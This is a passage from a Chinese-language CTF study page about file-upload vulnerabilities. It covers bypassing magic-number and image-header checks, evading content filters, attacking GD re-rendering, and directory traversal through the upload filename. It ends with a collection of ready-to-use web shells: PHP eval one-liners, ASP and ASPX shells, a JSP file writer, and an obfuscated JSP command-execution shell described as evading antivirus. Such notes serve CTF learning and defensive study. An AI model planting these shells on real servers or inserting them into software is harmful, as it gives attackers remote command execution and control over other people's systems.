</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><ul><li>使用#注释使得.htaccess能够成功解析</li></ul></blockquote> <h3 id="服务器检测-文件内容检测">服务器检测（文件内容检测） <a href="#服务器检测-文件内容检测" class="header-anchor">#</a></h3> <h4 id="文件幻数检测-文件开头">文件幻数检测（文件开头） <a href="#文件幻数检测-文件开头" class="header-anchor">#</a></h4> <blockquote><p>幻数 magic number，它可以用来标记文件或者协议的格式，很多文件都有幻数标志来表明该文件的格式。</p></blockquote> <p>要绕过文件幻数检测就要在文件开头写上如下的值</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>.jpg	FF D8 FF E0 00 10 4A 46 49 46
.gif	47 49 46 38 39 61
.png	89 50 4E 47
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>在文件幻数后面加上自己的WebShell代码就行</p> <h4 id="文件相关信息检测">文件相关信息检测 <a href="#文件相关信息检测" class="header-anchor">#</a></h4> <p>图像文件相关信息检测常用的是getimagesize()函数，需要把文件头部分伪造，也就是在幻数的基础上还加了一些文件信息。</p> <blockquote><ul><li>例如下面结构</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>GIF89a
(...some binary data for image...)
&lt;?php phpinfo(); ?&gt;
(... skipping the rest of binary data ...)
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div></blockquote> <p>另一种是判断是否包含<code>&lt;?</code>或者<code>php</code></p> <blockquote><ul><li><p>绕过<code>&lt;?</code>：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;script language='php'&gt;@eval($_POST[cmd]);&lt;/script&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li> <li><p>绕过<code>php</code>：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;?= @eval($_POST['cmd']);?&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li></ul></blockquote> <p>绕过方法：</p> <blockquote><ul><li>对渲染/加载测试的攻击方式是代码注入绕过。使用winhex在不破坏文件本身的渲染情况下找一个空白区进行填充代码，一般为图片的注释区。</li> <li>对二次渲染的攻击方式就是攻击文件加载器自身。例如：</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>上传文件数据不完整的gif文件 -&gt; 触发报错imagecreatefromgif()函数
上传文件数据不完整的png文件 -&gt; 触发报错imagecreatefrompng()函数
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>某后台调用GD库对图像进行二次渲染的代码</p> <div class="language- line-numbers-mode"><pre class="language-text"><code> function image_gd_open($file, $extension)
 {
 $extension = str_replace('jpg', 'jpeg', $extension);
 $open_func = 'imageCreateFrom'. $extension; //函数名变成imageCreateFrompng 之类
 if (!function_exists($open_func))
 {
 	return FALSE;
 }
 return $open_func($file); //变成imagecreatefrompng('/tmp/phpimage')
 }
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><ul><li>对文件加载器进行攻击，常见的就是溢出攻击。上传自己的恶意文件后，服务器上的文件加载器会主动进行加载测试，加载测试时被溢出攻击执行shellcode，比如access/mdb溢出。</li></ul></blockquote> <h3 id="文件上传中的目录穿越漏洞">文件上传中的目录穿越漏洞 <a href="#文件上传中的目录穿越漏洞" class="header-anchor">#</a></h3> <p>攻击方式</p> <blockquote><p>形式：上传的文件会被解析为日志不能执行，给出了<code>/uploads/xxx.php</code>路径并且可以查询</p> <p>绕过：上传文件的时候抓包，修改文件名（filename）为<code>./../../../../flag</code>，上传成功后路径变为<code>/uploads/./../../../../flag</code>即可进行目录穿越</p></blockquote> <h2 id="攻击代码">攻击代码 <a href="#攻击代码" class="header-anchor">#</a></h2> <h3 id="常用攻击代码">常用攻击代码 <a href="#常用攻击代码" class="header-anchor">#</a></h3> <blockquote><p>简单的一句话木马</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;?php @eval($_POST['cmd']);?&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>绕过<code>&lt;?</code>限制的一句话木马</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;script language = 'php'&gt;@eval($_POST[cmd]);&lt;/script&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>绕过<code>&lt;?php ?&gt;</code>限制的一句话木马</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;?= @eval($_POST['cmd']);
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>asp一句话木马</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;%eval(Request.Item[&quot;cmd&quot;],”unsafe”);%&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>JSP一句话木马</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;%if(request.getParameter(&quot;f&quot;)!=null)(newjava.io.FileOutputStream (application.getRealPath(&quot;\\&quot;)+request.getParameter(&quot;f&quot;))).write (request.getParameter(&quot;t&quot;).getBytes());%&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>JSP一句话免杀（ASCLL编码）</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;%@ page contentType=&quot;text/html;charset=UTF-8&quot;  language=&quot;java&quot; %&gt;
&lt;%
    if(request.getParameter(&quot;cmd&quot;)!=null){
        Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
        Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null), request.getParameter(&quot;cmd&quot;) );
        java.io.InputStream in = e.getInputStream();
        int a = -1;byte[] b = new byte[2048];out.print(&quot;&lt;pre&gt;&quot;);
        while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print(&quot;&lt;/pre&gt;&quot;);
    }
%&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>ASPX一句话</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;script language=&quot;C#&quot;runat=&quot;server&quot;&gt;WebAdmin2Y.x.y a=new WebAdmin2Y.x.y(&quot;add6bb58e139be10&quot;)&lt;/script&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></blockquote> <h3 id="其它攻击代码">其它攻击代码 <a href="#其它攻击代码" class="header-anchor">#</a></h3> <blockquote><p>异或取反等操作写shell的php脚本、混淆木马、不死马。</p></blockquote> <h2 id="更多参考">更多参考 <a href="#更多参考" class="header-anchor">#</a></h2> <p>https://bbs.ichunqiu.com/thread-41672-1-1.html?from=sec</p> <p>https://www.freebuf.com/articles/web/253698.html</p> <p>https://www.freebuf.com/articles/web/179954.html</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/ctf/php-serialize.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        PHP反序列化
      </a></span> <span class="next"><a href="/knowledge/ctf/deserialize-byte-escape.html">
        反序列化字节逃逸
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/48.59af224e.js" defer></script>
  </body>
</html>